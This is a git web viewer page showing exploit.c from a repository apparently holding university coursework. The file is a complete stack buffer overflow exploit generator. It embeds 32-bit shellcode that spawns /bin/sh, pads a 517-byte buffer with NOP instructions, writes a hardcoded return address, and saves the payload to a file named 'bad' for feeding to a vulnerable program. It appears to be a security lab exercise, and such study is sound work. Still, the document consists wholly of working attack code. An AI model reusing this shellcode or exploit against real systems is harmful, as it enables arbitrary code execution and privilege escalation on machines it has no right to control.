uni

University stuff
git clone git://git.margiolis.net/uni.git
Log | Files | Refs | README | LICENSE

exploit.c (908B)

      1 #include <err.h>
      2 #include <stdio.h>
      3 #include <stdlib.h>
      4 #include <string.h>
      5 
      6 static const char code[] =
      7 	"\x31\xc0"	/* xorl		%eax, %eax	*/
      8 	"\x50"		/* pushl	%eax		*/
      9 	"\x68""//sh"	/* pushl	addr		*/
     10 	"\x68""/bin"	/* pushl	addr		*/
     11 	"\x89\xe3"	/* movl		%esp, %ebx	*/
     12 	"\x50"		/* pushl	%eax		*/
     13 	"\x53"		/* pushl	%ebx		*/
     14 	"\x89\xe1"	/* movl		%esp, %ecx	*/
     15 	"\x99"		/* cdq				*/
     16 	"\xb0\x0b"	/* movb		$0x0b, %al	*/
     17 	"\xcd\x80"	/* int		$0x80		*/
     18 	;
     19 
     20 int
     21 main(int argc, char *argv[])
     22 {
     23 	FILE *badfp;
     24 	char buf[517];
     25 
     26 	/* fill with NOPs */
     27 	memset(&buf, 0x90, sizeof(buf));
     28 
     29 	/* place return address */
     30 	*((long *)(buf + 0x24)) = 0x7fffffffe670 + 0x60;
     31 
     32 	/* write shellcode at the end of buf */
     33 	memcpy(buf + sizeof(buf) - sizeof(code), code, sizeof(code));
     34 
     35 	/* save to badfp */
     36 	if ((badfp = fopen("bad", "w")) == NULL)
     37 		err(1, "fopen(bad)");
     38 	fwrite(buf, sizeof(buf), 1, badfp);
     39 	fclose(badfp);
     40 
     41 	return (0);
     42 }